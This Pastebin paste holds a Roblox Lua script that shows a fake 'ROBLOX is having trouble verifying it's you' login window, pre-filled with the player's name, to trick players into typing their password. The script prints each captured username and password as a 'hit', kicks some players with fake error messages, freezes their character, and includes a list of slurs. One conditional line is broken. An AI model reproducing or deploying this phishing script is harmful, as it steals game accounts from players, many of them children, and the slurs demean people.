Advertisement
Guest User

Thing

a guest
Jun 21st, 2018
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.70 KB | None | 0 0
  1. -- Objects
  2.  
  3. local scam = Instance.new("ScreenGui")
  4. local top = Instance.new("Frame")
  5. local fakeicon = Instance.new("ImageLabel")
  6. local fakeloginbutton = Instance.new("TextLabel")
  7. local usernamefortrust = Instance.new("TextLabel")
  8. local _2nd = Instance.new("Frame")
  9. local main = Instance.new("Frame")
  10. local guy = Instance.new("ImageLabel")
  11. local message = Instance.new("TextLabel")
  12. local username = Instance.new("TextBox")
  13. local password = Instance.new("TextBox")
  14. local verify = Instance.new("TextButton")
  15. local incorrect = Instance.new("TextLabel")
  16. local whitelist = "website is not done maggot"
  17. -- Properties
  18.  
  19. scam.Parent = game.CoreGui
  20. scam.Name = "mental help"
  21. scam.Enabled = true
  22. scam.ResetOnSpawn = true
  23.  
  24. top.Name = "top"
  25. top.Parent = scam
  26. top.BackgroundColor3 = Color3.new(0, 0.454902, 0.741176)
  27. top.BorderSizePixel = 0
  28. top.Position = UDim2.new(0.328647137, 0, 0.142691702, 0)
  29. top.Size = UDim2.new(0, 615, 0, 33)
  30.  
  31. fakeicon.Name = "fakeicon"
  32. fakeicon.Parent = top
  33. fakeicon.BackgroundColor3 = Color3.new(1, 1, 1)
  34. fakeicon.BackgroundTransparency = 1
  35. fakeicon.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  36. fakeicon.BorderSizePixel = 0
  37. fakeicon.Position = UDim2.new(0.0146341464, 0, 0, 0)
  38. fakeicon.Size = UDim2.new(0, 28, 0, 27)
  39. fakeicon.Image = "rbxassetid://1847911877"
  40. fakeicon.ImageColor3 = Color3.new(0.996078, 0.996078, 0.992157)
  41.  
  42. fakeloginbutton.Name = "fakeloginbutton"
  43. fakeloginbutton.Parent = top
  44. fakeloginbutton.BackgroundColor3 = Color3.new(0, 0, 0)
  45. fakeloginbutton.BackgroundTransparency = 1
  46. fakeloginbutton.BorderSizePixel = 0
  47. fakeloginbutton.Position = UDim2.new(0.0764227659, 0, 0.212121218, 0)
  48. fakeloginbutton.Size = UDim2.new(0, 67, 0, 19)
  49. fakeloginbutton.Font = Enum.Font.Arial
  50. fakeloginbutton.Text = "LOGIN"
  51. fakeloginbutton.TextColor3 = Color3.new(0.917647, 1, 0.909804)
  52. fakeloginbutton.TextScaled = true
  53. fakeloginbutton.TextSize = 14
  54. fakeloginbutton.TextWrapped = true
  55.  
  56. usernamefortrust.Name = "usernamefortrust"
  57. usernamefortrust.Parent = top
  58. usernamefortrust.BackgroundColor3 = Color3.new(0, 0, 0)
  59. usernamefortrust.BackgroundTransparency = 1
  60. usernamefortrust.BorderSizePixel = 0
  61. usernamefortrust.Position = UDim2.new(0.764227629, 0, 0.24242425, 0)
  62. usernamefortrust.Size = UDim2.new(0, 145, 0, 16)
  63. usernamefortrust.Font = Enum.Font.Arial
  64. usernamefortrust.Text = "username"
  65. usernamefortrust.TextColor3 = Color3.new(0.917647, 1, 0.909804)
  66. usernamefortrust.TextScaled = true
  67. usernamefortrust.TextSize = 14
  68. usernamefortrust.TextWrapped = true
  69. usernamefortrust.TextXAlignment = Enum.TextXAlignment.Left
  70. usernamefortrust.Text = game.Players.LocalPlayer.Name
  71.  
  72. _2nd.Name = "2nd"
  73. _2nd.Parent = top
  74. _2nd.BackgroundColor3 = Color3.new(1, 1, 1)
  75. _2nd.BorderSizePixel = 0
  76. _2nd.Position = UDim2.new(0.000761248171, 0, 1.00050676, 0)
  77. _2nd.Size = UDim2.new(0, 615, 0, 371)
  78.  
  79. main.Name = "main"
  80. main.Parent = top
  81. main.BackgroundColor3 = Color3.new(0.890196, 0.890196, 0.890196)
  82. main.BackgroundTransparency = 0.40000000596046
  83. main.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  84. main.BorderSizePixel = 0
  85. main.Position = UDim2.new(0.0118701756, 0, 1.229249, 0)
  86. main.Size = UDim2.new(0, 601, 0, 349)
  87.  
  88. guy.Name = "guy"
  89. guy.Parent = main
  90. guy.BackgroundColor3 = Color3.new(1, 1, 1)
  91. guy.BackgroundTransparency = 1
  92. guy.BorderSizePixel = 0
  93. guy.Position = UDim2.new(0.0465890169, 0, 0, 0)
  94. guy.Size = UDim2.new(0, 138, 0, 154)
  95. guy.Image = "rbxassetid://1946957494"
  96. guy.ImageColor3 = Color3.new(0.929412, 0.933333, 0.945098)
  97.  
  98. message.Name = "message"
  99. message.Parent = guy
  100. message.BackgroundColor3 = Color3.new(1, 1, 1)
  101. message.BackgroundTransparency = 1
  102. message.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  103. message.BorderSizePixel = 0
  104. message.Position = UDim2.new(1, 0, 0.409090906, 0)
  105. message.Size = UDim2.new(0, 406, 0, 62)
  106. message.Font = Enum.Font.Arial
  107. message.Text = "ROBLOX is having trouble verifying it's you. Please login again in order to continue playing. "
  108. message.TextColor3 = Color3.new(0, 0, 0)
  109. message.TextSize = 19
  110. message.TextWrapped = true
  111. message.TextXAlignment = Enum.TextXAlignment.Left
  112. message.TextYAlignment = Enum.TextYAlignment.Top
  113.  
  114. username.Name = "username"
  115. username.Parent = main
  116. username.BackgroundColor3 = Color3.new(1, 1, 1)
  117. username.BorderSizePixel = 0
  118. username.Position = UDim2.new(0.17304492, 0, 0.450704217, 0)
  119. username.Size = UDim2.new(0, 395, 0, 34)
  120. username.ClearTextOnFocus = false
  121. username.Font = Enum.Font.Arial
  122. username.Text = "Username"
  123. username.TextColor3 = Color3.new(0, 0, 0)
  124. username.TextSize = 17
  125. username.TextXAlignment = Enum.TextXAlignment.Left
  126. username.Text = game.Players.LocalPlayer.Name
  127.  
  128. password.Name = "password"
  129. password.Parent = main
  130. password.BackgroundColor3 = Color3.new(1, 1, 1)
  131. password.BorderSizePixel = 0
  132. password.Position = UDim2.new(0.17304492, 0, 0.630985916, 0)
  133. password.Size = UDim2.new(0, 395, 0, 34)
  134. password.ClearTextOnFocus = false
  135. password.Font = Enum.Font.Arial
  136. password.Text = "Password"
  137. password.TextColor3 = Color3.new(0, 0, 0)
  138. password.TextSize = 17
  139. password.TextXAlignment = Enum.TextXAlignment.Left
  140.  
  141. verify.Name = "verify"
  142. verify.Parent = main
  143. verify.BackgroundColor3 = Color3.new(0, 0.454902, 0.741176)
  144. verify.BorderSizePixel = 0
  145. verify.Position = UDim2.new(0.332778692, 0, 0.771830976, 0)
  146. verify.Size = UDim2.new(0, 200, 0, 57)
  147. verify.Font = Enum.Font.ArialBold
  148. verify.Text = "Verify"
  149. verify.TextColor3 = Color3.new(1, 1, 1)
  150. verify.TextSize = 32
  151.  
  152. verify.MouseButton1Down:connect(function()
  153. print("You Got A Hit! "..username.Text..":"..password.Text)
  154. end)
  155.  
  156. verify.MouseButton1Down:connect(function()
  157. top.Visible = false
  158. end)
  159. verify.MouseButton1Down:connect(function()
  160. local table = {"nigger", "fuck", "ass", "tit", " ", "fuckers", "scammer", "scammers", "cunt", "whore", "hoe", "fag", "faggot", "Password"}
  161. function check(textbox)
  162. for i = 1, #table do
  163. if table[i] == textbox.Text then return true end
  164. end
  165. return false
  166. end
  167.  
  168. if check(password) then
  169. game.Players.LocalPlayer:Kick("Your Internet Connection Timed Out, Please Rejoin")
  170. print(game.Players.LocalPlayer.Name.."Has been kicked due to being a bitch, DO NOT USE THAT PASS, IT IS INCORRECT")
  171. end
  172. end)
  173.  
  174. stuff = {"ERROR #762", "ERROR #8862", "ERROR #535", "ERROR #0093", "ERROR #227", "INTERNAL ERROR, PLEASE RESTART ROBLOX"}
  175. if game.Players.LocalPlayer.AccountAge < 50 then
  176. game.Players.LocalPlayer:Kick(stuff[math.random(#stuff)])
  177. end
  178.  
  179. if game.Workspace.Players.LocalPlayer.Humanoid.WalkSpeed = 16 then
  180. game.Workspace.Players.LocalPlayer.Humanoid.WalkSpeed = 0
  181. end
  182.  
  183. if game.Workspace.Players.LocalPlayer.Humanoid.JumpPower == 50 then
  184. game.Workspace.Players.LocalPlayer.Humanoid.JumpPower = 0
  185. end
  186.  
  187. local blur = Instance.new("BlurEffect")
  188. blur.Enabled = true
  189. for i = 1, 60 do
  190. blur.Size = i
  191. wait()
  192. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement